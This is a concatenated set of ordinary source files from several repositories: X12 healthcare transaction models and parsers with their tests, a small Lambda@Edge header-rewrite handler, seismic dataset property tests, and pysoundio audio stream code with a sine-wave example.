aaa_segment: Optional[List[Loop2100BAaaSegment]]
prv_segment: Optional[Loop2100BPrvSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000B(X12SegmentGroup):
"""
Loop 2000B - Information Receiver
"""
hl_segment: Loop2000BHlSegment
loop_2100b: Loop2100B
loop_2000c: Optional[List[Loop2000C]]
class Loop2100A(X12SegmentGroup):
"""
Loop 2100A - Information Source Name
"""
nm1_segment: Loop2100ANm1Segment
prv_segment: Optional[List[PrvSegment]] = Field(min_items=0, max_items=3)
aaa_segment: Optional[List[Loop2100AAaaSegment]] = Field(min_items=0, max_items=9)
class Loop2000A(X12SegmentGroup):
"""
Loop 2000A - Information Source
The root node/loop for the 271 transaction
"""
hl_segment: Loop2000AHlSegment
aaa_segment: Optional[List[Loop2000AAaaSegment]] = Field(min_items=0, max_items=9)
loop_2100a: Loop2100A
loop_2000b: List[Loop2000B] = Field(min_items=0)
class Footer(X12SegmentGroup):
"""
Transaction Footer Information
"""
se_segment: SeSegment
```
#### File: v5010/x12_271_005010X279A1/transaction_set.py
```python
from typing import List, Dict, Tuple
from linuxforhealth.x12.models import X12SegmentGroup
from .loops import Footer, Header, Loop2000A
from pydantic import root_validator
from linuxforhealth.x12.validators import validate_segment_count
class EligibilityBenefit(X12SegmentGroup):
"""
The ASC X12 271 (EligibilityBenefit) transaction model.
"""
header: Header
loop_2000a: List[Loop2000A]
footer: Footer
_validate_segment_count = root_validator(allow_reuse=True)(validate_segment_count)
@root_validator
def validate_subscriber_name(cls, values):
"""
Validates that the subscriber mame is present if the subscriber is a patient
:param values: The raw, unvalidated transaction data.
"""
for info_source in values.get("loop_2000a", []):
for info_receiver in info_source.loop_2000b:
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
child_code = subscriber.hl_segment.hierarchical_child_code
first_name = subscriber.loop_2100c.nm1_segment.name_first
if child_code == "0" and not first_name:
raise ValueError(
f"name_first is required when the subscriber is the patient"
)
return values
@root_validator
def validate_subscriber_hierarchy_child_code(cls, values):
"""
Validates that a subscriber's hierarchy child code is set correctly based on the presence of a dependent loop.
:param values: The raw, unvalidated transaction data.
"""
for info_source in values.get("loop_2000a", []):
for info_receiver in info_source.loop_2000b:
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
child_code = subscriber.hl_segment.hierarchical_child_code
if child_code == "1" and not subscriber.loop_2000d:
raise ValueError(
f"Invalid subscriber hierarchy code {child_code} no dependent record is present"
)
return values
@root_validator
def validate_hierarchy_ids(cls, values):
"""
Validates the HL segments linkage in regards to the entire EligibilityInquiry transaction.
Validations are limited to checks that are not covered within a segment or field scope.
:param values: The raw, unvalidated transaction data.
"""
def get_ids(hl_segment: Dict) -> Tuple[int, int]:
"""returns tuple of (id, parent_id)"""
id = hl_segment.hierarchical_id_number
parent_id = hl_segment.hierarchical_parent_id_number
return int(id) if id else 0, int(parent_id) if parent_id else 0
for info_source in values.get("loop_2000a", []):
# info source does not have a parent id, since it starts a new hierarchy - this is validated at the
# segment level
source_id, _ = get_ids(info_source.hl_segment)
previous_id: int = source_id
for info_receiver in info_source.loop_2000b:
receiver_id, receiver_parent_id = get_ids(info_receiver.hl_segment)
if receiver_parent_id != previous_id:
raise ValueError(f"Invalid receiver parent id {receiver_parent_id}")
if receiver_parent_id != source_id:
raise ValueError(
f"receiver parent id {receiver_parent_id} != source id {source_id}"
)
previous_id = receiver_id
info_receivers = info_receiver.loop_2000c or []
for subscriber in info_receivers:
subscriber_id, subscriber_parent_id = get_ids(subscriber.hl_segment)
if subscriber_parent_id != previous_id:
raise ValueError(
f"Invalid subscriber parent id {subscriber_parent_id}"
)
if subscriber_parent_id != receiver_id:
raise ValueError(
f"subscriber parent id {subscriber_parent_id} != receiver id {receiver_id}"
)
previous_id = subscriber_id
if not subscriber.loop_2000d:
continue
for dependent in subscriber.loop_2000d:
dependent_id, dependent_parent_id = get_ids(
dependent.hl_segment
)
if dependent_parent_id != previous_id:
raise ValueError(
f"Invalid dependent parent id {dependent_parent_id}"
)
if dependent_parent_id != subscriber_id:
raise ValueError(
f"dependent parent id {dependent_parent_id} != subscriber id {subscriber_id}"
)
previous_id = dependent_id
return values
```
#### File: v5010/x12_276_005010X212/parsing.py
```python
from enum import Enum
from linuxforhealth.x12.parsing import X12ParserContext, match
from typing import Dict, Optional
class TransactionLoops(str, Enum):
"""
The loops used to support the 276 005010X212 format.
"""
HEADER = "header"
INFORMATION_SOURCE_LEVEL = "loop_2000a"
PAYER_NAME = "loop_2100a"
INFORMATION_RECEIVER_LEVEL = "loop_2000b"
INFORMATION_RECEIVER_NAME = "loop_2100b"
SERVICE_PROVIDER_LEVEL = "loop_2000c"
SERVICE_PROVIDER_NAME = "loop_2100c"
SUBSCRIBER_LEVEL = "loop_2000d"
SUBSCRIBER_NAME = "loop_2100d"
SUBSCRIBER_CLAIM_STATUS_TRACKING_NUMBER = "loop_2200d"
SUBSCRIBER_SERVICE_LINE_INFORMATION = "loop_2210d"
DEPENDENT_LEVEL = "loop_2000e"
DEPENDENT_NAME = "loop_2100e"
DEPENDENT_CLAIM_STATUS_TRACKING_NUMBER = "loop_2200e"
DEPENDENT_SERVICE_LINE_INFORMATION = "loop_2210e"
FOOTER = "footer"
def _get_information_source(context: X12ParserContext) -> Optional[Dict]:
return context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL][-1]
def _get_information_receiver(context: X12ParserContext) -> Dict:
"""Returns the current information receiver record"""
information_source = _get_information_source(context)
return information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL][-1]
def _get_service_provider(
context: X12ParserContext, hierarchical_id: str
) -> Optional[Dict]:
"""
Returns the service provider record by id.
:param hierarchical_id: The service provider hierarchical level id
"""
information_receiver = _get_information_receiver(context)
for sp in information_receiver.get(TransactionLoops.SERVICE_PROVIDER_LEVEL, []):
sp_hierarchical_id = sp.get("hl_segment", {}).get("hierarchical_id_number")
if sp_hierarchical_id == hierarchical_id:
return sp
return None
def _is_subscriber(patient_record: Dict):
"""Returns true if the patient is a subscriber record"""
return patient_record.get("hl_segment", {}).get("hierarchical_level_code") == "22"
@match("ST")
def set_header_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the transaction set header loop for the 276 transaction set.
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
context.set_loop_context(
TransactionLoops.HEADER, context.transaction_data[TransactionLoops.HEADER]
)
@match("HL", {"hierarchical_level_code": "20"})
def set_information_source_loop(context: X12ParserContext, segment_data: Dict):
"""
Sets the information source loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if TransactionLoops.INFORMATION_SOURCE_LEVEL not in context.transaction_data:
context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL] = []
context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL].append({})
loop_record = context.transaction_data[TransactionLoops.INFORMATION_SOURCE_LEVEL][
-1
]
context.set_loop_context(TransactionLoops.INFORMATION_SOURCE_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "PR"})
def set_payer_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Information Source/Payer Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.INFORMATION_SOURCE_LEVEL:
information_source = _get_information_source(context)
information_source[TransactionLoops.PAYER_NAME] = {}
loop_record = information_source[TransactionLoops.PAYER_NAME]
context.set_loop_context(TransactionLoops.PAYER_NAME, loop_record)
@match("HL", {"hierarchical_level_code": "21"})
def set_information_receiver_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the information receiver loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
information_source = _get_information_source(context)
if TransactionLoops.INFORMATION_RECEIVER_LEVEL not in information_source:
information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL] = []
information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL].append({})
loop_record = information_source[TransactionLoops.INFORMATION_RECEIVER_LEVEL][-1]
context.set_loop_context(TransactionLoops.INFORMATION_RECEIVER_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "41"})
def set_information_receiver_name_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the Information Receiver Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.INFORMATION_RECEIVER_LEVEL:
information_receiver = _get_information_receiver(context)
information_receiver[TransactionLoops.INFORMATION_RECEIVER_NAME] = {}
loop_record = information_receiver[TransactionLoops.INFORMATION_RECEIVER_NAME]
context.set_loop_context(
TransactionLoops.INFORMATION_RECEIVER_NAME, loop_record
)
@match("HL", {"hierarchical_level_code": "19"})
def set_service_provider_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the service provider loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
information_receiver = _get_information_receiver(context)
if TransactionLoops.SERVICE_PROVIDER_LEVEL not in information_receiver:
information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL] = []
information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL].append({})
loop_record = information_receiver[TransactionLoops.SERVICE_PROVIDER_LEVEL][-1]
context.set_loop_context(TransactionLoops.SERVICE_PROVIDER_LEVEL, loop_record)
@match("NM1", {"entity_identifier_code": "1P"})
def set_service_provider_name_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the Service Provider Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.SERVICE_PROVIDER_LEVEL:
context.loop_container[TransactionLoops.SERVICE_PROVIDER_NAME] = {}
loop_record = context.loop_container[TransactionLoops.SERVICE_PROVIDER_NAME]
context.set_loop_context(TransactionLoops.SERVICE_PROVIDER_NAME, loop_record)
@match("HL", {"hierarchical_level_code": "22"})
def set_subscriber_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the subscriber loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
service_provider_id = segment_data.get("hierarchical_parent_id_number")
service_provider = _get_service_provider(context, service_provider_id)
if service_provider is None:
raise LookupError(f"Service Provider ID {service_provider_id} not found")
if TransactionLoops.SUBSCRIBER_LEVEL not in service_provider:
service_provider[TransactionLoops.SUBSCRIBER_LEVEL] = []
service_provider[TransactionLoops.SUBSCRIBER_LEVEL].append({})
context.subscriber_record = service_provider[TransactionLoops.SUBSCRIBER_LEVEL][-1]
context.set_loop_context(
TransactionLoops.SUBSCRIBER_LEVEL, context.subscriber_record
)
# subscriber is patient
if segment_data.get("hierarchical_child_code", "0") == "0":
context.patient_record = context.subscriber_record
@match("NM1", {"entity_identifier_code": "IL"})
def set_subscriber_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Subscriber Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.SUBSCRIBER_LEVEL:
context.subscriber_record[TransactionLoops.SUBSCRIBER_NAME] = {}
loop_record = context.subscriber_record[TransactionLoops.SUBSCRIBER_NAME]
context.set_loop_context(TransactionLoops.SUBSCRIBER_NAME, loop_record)
@match("TRN")
def set_claim_status_tracking_loop(
context: X12ParserContext, segment_data: Dict
) -> None:
"""
Sets the claim status tracking loop for the patient (subscriber or dependent)
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if _is_subscriber(context.patient_record):
loop_name = TransactionLoops.SUBSCRIBER_CLAIM_STATUS_TRACKING_NUMBER
else:
loop_name = TransactionLoops.DEPENDENT_CLAIM_STATUS_TRACKING_NUMBER
if loop_name not in context.patient_record:
context.patient_record[loop_name] = []
context.patient_record[loop_name].append({"ref_segment": []})
loop_record = context.patient_record[loop_name][-1]
context.set_loop_context(loop_name, loop_record)
@match("SVC")
def set_service_line_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the service line loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
claim_status = context.loop_container
if _is_subscriber(context.patient_record):
loop_name = TransactionLoops.SUBSCRIBER_SERVICE_LINE_INFORMATION
else:
loop_name = TransactionLoops.DEPENDENT_SERVICE_LINE_INFORMATION
if loop_name not in claim_status:
claim_status[loop_name] = []
claim_status[loop_name].append({})
loop_record = claim_status[loop_name][-1]
context.set_loop_context(loop_name, loop_record)
@match("HL", {"hierarchical_level_code": "23"})
def set_dependent_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the dependent loop
"""
if TransactionLoops.DEPENDENT_LEVEL not in context.subscriber_record:
context.subscriber_record[TransactionLoops.DEPENDENT_LEVEL] = []
context.subscriber_record[TransactionLoops.DEPENDENT_LEVEL].append({})
context.patient_record = context.subscriber_record[
TransactionLoops.DEPENDENT_LEVEL
][-1]
context.set_loop_context(TransactionLoops.DEPENDENT_LEVEL, context.patient_record)
@match("NM1", {"entity_identifier_code": "QC"})
def set_dependent_name_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the Dependent Name Loop
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
if context.loop_name == TransactionLoops.DEPENDENT_LEVEL:
context.patient_record[TransactionLoops.DEPENDENT_NAME] = {}
loop_record = context.patient_record[TransactionLoops.DEPENDENT_NAME]
context.set_loop_context(TransactionLoops.DEPENDENT_NAME, loop_record)
@match("SE")
def set_footer_loop(context: X12ParserContext, segment_data: Dict) -> None:
"""
Sets the transaction set footer loop.
:param context: The X12Parsing context which contains the current loop and transaction record.
:param segment_data: The current segment data
"""
context.set_loop_context(
TransactionLoops.FOOTER, context.transaction_data["footer"]
)
```
#### File: tests/healthcare_claim_payment/test_835_005010X221A1.py
```python
import pytest
from tests.support import assert_eq_model, resources_directory
import os
@pytest.fixture
def resource_path() -> str:
return os.path.join(resources_directory, "835_005010X221A1")
@pytest.mark.parametrize(
"file_name",
[
"medicare-part-a.835",
"managed-care.835",
"secondary-payment.835",
"tertiary-payment.835",
"cob-contractural-adjustment.835",
],
)
def test_835_model(resource_path, file_name: str):
x12_file_path = os.path.join(resource_path, file_name)
assert os.path.exists(x12_file_path)
assert_eq_model(x12_file_path)
```
#### File: src/tests/test_common_validations.py
```python
from linuxforhealth.x12.io import X12ModelReader
import pytest
def test_segment_footer_count(simple_270_with_new_lines):
"""Validates the total segment count validation raises an exception"""
test_input = simple_270_with_new_lines.replace("SE*17*0001~", "SE*27*0001~")
with pytest.raises(ValueError):
with X12ModelReader(test_input) as r:
for _ in r.models():
pass
```
#### File: src/tests/test_support.py
```python
import pytest
import datetime
from linuxforhealth.x12.support import (
is_x12_data,
is_x12_file,
parse_x12_date,
parse_interchange_date,
count_segments,
parse_x12_major_version,
get_latest_implementation_version,
)
from linuxforhealth.x12.io import X12ModelReader
@pytest.mark.parametrize(
"test_input, is_fixture, expected",
[
("simple_270_with_new_lines", True, True),
("simple_270_one_line", True, True),
("foo", False, False),
("", False, False),
(None, False, False),
],
)
def test_is_x12_data(request, test_input: str, is_fixture: bool, expected: bool):
"""
Tests is_x12_data with fixtures and literal values.
:param request: The pytest request fixture. Used to lookup fixture values by name.
:param test_input: The fixture name or the literal value.
:param is_fixture: Indicates if test_input is a fixture name.
:param expected: The expected test value
"""
input_value = request.getfixturevalue(test_input) if is_fixture else test_input
assert is_x12_data(input_value) is expected
@pytest.mark.parametrize(
"test_input", ["simple_270_with_new_lines", "simple_270_one_line"]
)
def test_is_x12_file_true(request, tmpdir, test_input: str):
"""
Tests is_x12_file where the expected result is True.
:param request: The pytest request fixture. Used to lookup fixture values by name.
:param tmpdir: The pytest tmpdir fixture. Used to create tmp directory and files.
:param test_input: The fixture name.
"""
input_value = request.getfixturevalue(test_input)
f = tmpdir.mkdir("x12-support").join("test.x12")
f.write(input_value)
assert is_x12_file(f)
def test_is_x12_file_false():
assert is_x12_file("/home/not-a-real/file.txt") is False
assert is_x12_file("") is False
assert is_x12_file(None) is False
def test_parser_interchange_date():
assert parse_interchange_date("131031") == datetime.date(2013, 10, 31)
def test_parse_x12_date():
assert parse_x12_date("20120501") == datetime.date(2012, 5, 1)
assert parse_x12_date("201205011010") == datetime.datetime(2012, 5, 1, 10, 10)
assert parse_x12_date("") is None
assert parse_x12_date(None) is None
def test_count_segments(simple_270_with_new_lines):
with X12ModelReader(simple_270_with_new_lines) as r:
model = [m for m in r.models()][0]
model_data = model.dict()
segment_count: int = count_segments(model_data)
assert segment_count == 17
def test_parse_x12_major_version():
assert parse_x12_major_version("005010X279A1") == "5010"
assert parse_x12_major_version("00501") == ""
assert parse_x12_major_version(None) == ""
def test_get_final_implementation_version():
assert get_latest_implementation_version("005010X222") == "005010X222A2"
assert get_latest_implementation_version("005010X222A1") == "005010X222A2"
assert get_latest_implementation_version("005010X222A2") == "005010X222A2"
with pytest.raises(KeyError):
get_latest_implementation_version("invalid-version")
``` |
{
"source": "Joe-Wu-88/my-test-repository",
"score": 2
} |
#### File: build/ModifyRequestHeaderFunction/app.py
```python
import os
def lambda_handler(event, context):
request = event['Records'][0]['cf']['request']
originDomain = os.environ['originDomain']
request['headers']['host'][0]['value'] = originDomain;
return request
``` |
{
"source": "JoeXinfa/pieseis",
"score": 3
} |
#### File: pieseis/tests/property_test.py
```python
import unittest
import sys
sys.path.append('..')
import pieseis.io.jsfile as jsfile
from pieseis.io import properties
from pieseis.tests.config_for_test import TEST_DATASET
class TestFileProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.file_properties = self.js_dataset.file_properties
def tearDown(self):
pass
def test_get_nr_dimensions(self):
self.assertTrue(isinstance(self.file_properties.nr_dimensions, int))
self.assertTrue(self.file_properties.nr_dimensions > 0)
class TestTraceProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.trace_properties = self.js_dataset.trace_properties
def tearDown(self):
pass
def test_get_all_header_names(self):
self.assertTrue(isinstance(self.trace_properties.header_names, list))
self.assertTrue(len(self.trace_properties.header_names) > 0)
def test_get_source_header(self):
self.assertIsInstance(self.trace_properties.header_values('SOURCE'), properties.TraceHeader)
def test_header_is_trace_header_object(self):
source_header = self.trace_properties.header_values('SOURCE')
self.assertIsInstance(source_header.byte_offset, int)
self.assertIsInstance(source_header.element_count, int)
class TestCustomProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.custom_properties = self.js_dataset.custom_properties
def tearDown(self):
pass
def assert_exists_and_string(self, prop):
self.assertIsNotNone(prop)
self.assertIsInstance(prop, str)
self.assertTrue(len(prop)>0)
def test_is_synthetic(self):
self.assertFalse(self.custom_properties.synthetic)
def test_secondary_key(self):
self.assertIsInstance(self.custom_properties.secondary_key, str)
def test_geometry_matches_flag(self):
self.assertIsInstance(self.custom_properties.geometry_matches_flag, int)
def test_primary_key(self):
self.assert_exists_and_string(self.custom_properties.primary_key)
# TODO: Maybe also check that the value is a VALID header??
def test_primary_sort(self):
self.assert_exists_and_string(self.custom_properties.primary_sort)
def test_trace_no_matches_flag(self):
self.assertIsInstance(self.custom_properties.trace_no_matches_flag, int)
def test_stacked(self):
self.assertIsNotNone(self.custom_properties.stacked)
self.assertIsInstance(self.custom_properties, bool)
def test_cookie(self):
self.assertIsNotNone(self.custom_properties.cookie)
self.assertIsInstance(self.custom_properties.cookie, int)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joextodd/pysoundio",
"score": 3
} |
#### File: pysoundio/examples/sine.py
```python
import array as ar
import argparse
import math
import time
from pysoundio import (
PySoundIo,
SoundIoFormatFloat32LE,
)
class Player:
def __init__(self, freq=None, backend=None, output_device=None,
sample_rate=None, block_size=None):
self.pysoundio = PySoundIo(backend=backend)
self.freq = float(freq)
self.seconds_offset = 0.0
self.radians_per_second = self.freq * 2.0 * math.pi
self.seconds_per_frame = 1.0 / sample_rate
self.pysoundio.start_output_stream(
device_id=output_device,
channels=1,
sample_rate=sample_rate,
block_size=block_size,
dtype=SoundIoFormatFloat32LE,
write_callback=self.callback
)
def close(self):
self.pysoundio.close()
def callback(self, data, length):
indata = ar.array('f', [0] * length)
for i in range(0, length):
indata[i] = math.sin(
(self.seconds_offset + i * self.seconds_per_frame) * self.radians_per_second)
data[:] = indata.tobytes()
self.seconds_offset += self.seconds_per_frame * length
def get_args():
parser = argparse.ArgumentParser(
description='PySoundIo sine wave output example',
epilog='Play a sine wave over the default output device'
)
parser.add_argument('--freq', default=442.0, help='Note frequency (optional)')
parser.add_argument('--backend', type=int, help='Backend to use (optional)')
parser.add_argument('--blocksize', type=int, default=4096, help='Block size (optional)')
parser.add_argument('--rate', type=int, default=44100, help='Sample rate (optional)')
parser.add_argument('--device', type=int, help='Output device id (optional)')
args = parser.parse_args()
return args
def main():
args = get_args()
player = Player(args.freq, args.backend, args.device, args.rate, args.blocksize)
print('Playing...')
print('CTRL-C to exit')
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print('Exiting...')
player.close()
if __name__ == '__main__':
main()
```
#### File: pysoundio/pysoundio/pysoundio.py
```python
import logging
import threading
import time
from pysoundio._soundio import ffi as _ffi
from pysoundio._soundio import lib as _lib
from pysoundio import constants
class PySoundIoError(Exception):
pass
class _InputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.input['buffer']
self.callback = parent.input['read_callback']
self.bytes_per_frame = parent.input['bytes_per_frame']
self.daemon = True
self.running = True
self.start()
def run(self):
"""
When there is data ready in the input buffer,
pass it to the user callback.
"""
while self.running:
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.buffer)
if fill_bytes > 0:
read_buf = _lib.soundio_ring_buffer_read_ptr(self.buffer)
data = bytearray(fill_bytes)
_ffi.memmove(data, read_buf, fill_bytes)
if self.callback:
self.callback(data=data, length=int(fill_bytes / self.bytes_per_frame))
_lib.soundio_ring_buffer_advance_read_ptr(self.buffer, fill_bytes)
time.sleep(0.001)
def stop(self):
self.running = False
class _OutputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.output['buffer']
self.callback = parent.output['write_callback']
self.bytes_per_frame = parent.output['bytes_per_frame']
self.sample_rate = parent.output['sample_rate']
self.block_size = parent.output['block_size']
self.to_read = 0
self.running = True
self.daemon = True
self.start()
def run(self):
"""
Request output data from user callback when there is
free space in the buffer.
"""
while self.running:
if self.to_read > 0:
data = bytearray(self.block_size * self.bytes_per_frame)
free_bytes = _lib.soundio_ring_buffer_free_count(self.buffer)
if free_bytes > len(data):
if self.callback:
self.callback(data=data, length=self.block_size)
write_buf = _lib.soundio_ring_buffer_write_ptr(self.buffer)
_ffi.memmove(write_buf, data, len(data))
_lib.soundio_ring_buffer_advance_write_ptr(self.buffer, len(data))
with threading.Lock():
self.to_read -= 1
time.sleep(0.001)
def stop(self):
self.running = False
class PySoundIo:
def __init__(self, backend=None):
"""
Initialise PySoundIo.
Connect to a specific backend, or the default.
Parameters
----------
backend: (SoundIoBackend) see `Backends`_. (optional)
"""
self.backend = backend
self.input = {'device': None, 'stream': None, 'buffer': None, 'read_callback': None, 'thread': None}
self.output = {'device': None, 'stream': None, 'buffer': None, 'write_callback': None, 'thread': None}
self.logger = logging.getLogger(__name__)
self._soundio = _lib.soundio_create()
if not self._soundio:
raise PySoundIoError('Out of memory')
if backend:
self._check(_lib.soundio_connect_backend(self._soundio, backend))
else:
self._check(_lib.soundio_connect(self._soundio))
self._userdata = _ffi.new_handle(self)
self.flush()
def close(self):
"""
Clean up allocated memory
Close libsoundio connections
"""
self.logger.info('Closing down threads...')
if self.input['thread']:
self.input['thread'].stop()
while self.input['thread'].is_alive():
time.sleep(0.001)
if self.output['thread']:
self.output['thread'].stop()
while self.output['thread'].is_alive():
time.sleep(0.001)
self.logger.info('Closing down streams...')
if self.input['stream']:
_lib.soundio_instream_destroy(self.input['stream'])
del self.input['stream']
if self.output['stream']:
_lib.soundio_outstream_destroy(self.output['stream'])
del self.output['stream']
if self.input['buffer']:
_lib.soundio_ring_buffer_destroy(self.input['buffer'])
del self.input['buffer']
if self.output['buffer']:
_lib.soundio_ring_buffer_destroy(self.output['buffer'])
del self.output['buffer']
if self.input['device']:
_lib.soundio_device_unref(self.input['device'])
del self.input['device']
if self.output['device']:
_lib.soundio_device_unref(self.output['device'])
del self.output['device']
if self._soundio:
_lib.soundio_disconnect(self._soundio)
_lib.soundio_destroy(self._soundio)
del self._soundio
def flush(self):
"""
Atomically update information for all connected devices.
"""
_lib.soundio_flush_events(self._soundio)
@property
def version(self):
"""
Returns the current version of libsoundio
"""
return _ffi.string(_lib.soundio_version_string()).decode()
def _check(self, code):
"""
Returns an error message associated with the return code
"""
if code != _lib.SoundIoErrorNone:
raise PySoundIoError(_ffi.string(_lib.soundio_strerror(code)).decode())
@property
def backend_count(self):
"""
Returns the number of available backends.
"""
return _lib.soundio_backend_count(self._soundio)
def get_default_input_device(self):
"""
Returns default input device
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if the input device is not available
"""
device_id = _lib.soundio_default_input_device_index(self._soundio)
return self.get_input_device(device_id)
def get_input_device(self, device_id):
"""
Return an input device by index
Parameters
----------
device_id: (int) input device index
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_input_device_count(self._soundio):
raise PySoundIoError('Invalid input device id')
self.input['device'] = _lib.soundio_get_input_device(self._soundio, device_id)
return self.input['device']
def get_default_output_device(self):
"""
Returns default output device
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if the output device is not available
"""
device_id = _lib.soundio_default_output_device_index(self._soundio)
return self.get_output_device(device_id)
def get_output_device(self, device_id):
"""
Return an output device by index
Parameters
----------
device_id: (int) output device index
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_output_device_count(self._soundio):
raise PySoundIoError('Invalid output device id')
self.output['device'] = _lib.soundio_get_output_device(self._soundio, device_id)
return self.output['device']
def list_devices(self):
"""
Return a list of available devices
Returns
-------
(list)(dict) containing information on available input / output devices.
"""
output_count = _lib.soundio_output_device_count(self._soundio)
input_count = _lib.soundio_input_device_count(self._soundio)
default_output = _lib.soundio_default_output_device_index(self._soundio)
default_input = _lib.soundio_default_input_device_index(self._soundio)
input_devices = []
output_devices = []
for i in range(0, input_count):
device = _lib.soundio_get_input_device(self._soundio, i)
input_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_input == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
for i in range(0, output_count):
device = _lib.soundio_get_output_device(self._soundio, i)
output_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_output == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
self.logger.info('%d devices found' % (input_count + output_count))
return (input_devices, output_devices)
def get_layouts(self, device):
"""
Return a list of available layouts for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available channel layouts for a device
"""
current = device.current_layout
layouts = {
'current': {
'name': _ffi.string(current.name).decode() if current.name else 'None'
},
'available': []
}
for idx in range(0, device.layout_count):
layouts['available'].append({
'name': (_ffi.string(device.layouts[idx].name).decode() if
device.layouts[idx].name else 'None'),
'channel_count': device.layouts[idx].channel_count
})
return layouts
def get_sample_rates(self, device):
"""
Return a list of available sample rates for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available sample rates for a device
"""
sample_rates = {'current': device.sample_rate_current, 'available': []}
for s in range(0, device.sample_rate_count):
sample_rates['available'].append({
'min': device.sample_rates[s].min,
'max': device.sample_rates[s].max
})
return sample_rates
def get_formats(self, device):
"""
Return a list of available formats for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available formats for a device
"""
formats = {'current': device.current_format, 'available': []}
for r in range(0, device.format_count):
formats['available'].append(constants.FORMATS[device.formats[r]])
return formats
def supports_sample_rate(self, device, rate):
"""
Check the sample rate is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
rate (int): sample rate
Returns
-------
(bool) True if sample rate is supported for this device
"""
return bool(_lib.soundio_device_supports_sample_rate(device, rate))
def get_default_sample_rate(self, device):
"""
Get the best sample rate.
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(int) The best available sample rate
"""
sample_rate = None
for rate in constants.PRIORITISED_SAMPLE_RATES:
if self.supports_sample_rate(device, rate):
sample_rate = rate
break
if not sample_rate:
sample_rate = device.sample_rates.max
return sample_rate
